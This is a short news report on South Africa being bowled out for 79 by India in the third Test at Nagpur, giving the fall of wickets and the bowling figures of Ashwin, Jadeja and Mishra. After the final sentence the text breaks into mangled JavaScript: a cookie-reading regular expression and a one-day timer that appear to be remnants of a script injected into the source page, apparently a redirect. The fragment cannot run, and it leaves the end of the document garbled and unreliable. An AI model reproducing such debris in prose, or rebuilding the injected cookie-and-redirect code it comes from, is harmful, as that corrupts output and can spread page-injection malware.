India has dismissed South Africa for just 79 runs in first innings of the third Test in Nagpur.

It is the lowest score India has bowled a Test side out for.

But it could easily have been far, far worse for the Proteas.

South Africa resumed at 2-11 this morning, after dismissing India for 215 on day one.

The Proteas then lost three wickets for just one run, to be 5-12 after 13 overs, the equal-fourth lowest runs scored at the fall of the fifth wicket in Test history.

A few overs later, it was 6-35 and then 7-47. But South Africa managed to surpass Australia's shocking Ashes total of just 60, eventually stumbling to 79 runs in 33.1 overs.

JP Duminy top scored with 35, while the next highest runs scorer was No. 9 batsman Simon Harmer with 13.

Ravi Ashwin finished with figures of 5-32, while Jadeja finished with 4-33 and Mishra claimed one scalp.

India will begin their second innings with a lead of 136 runs. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
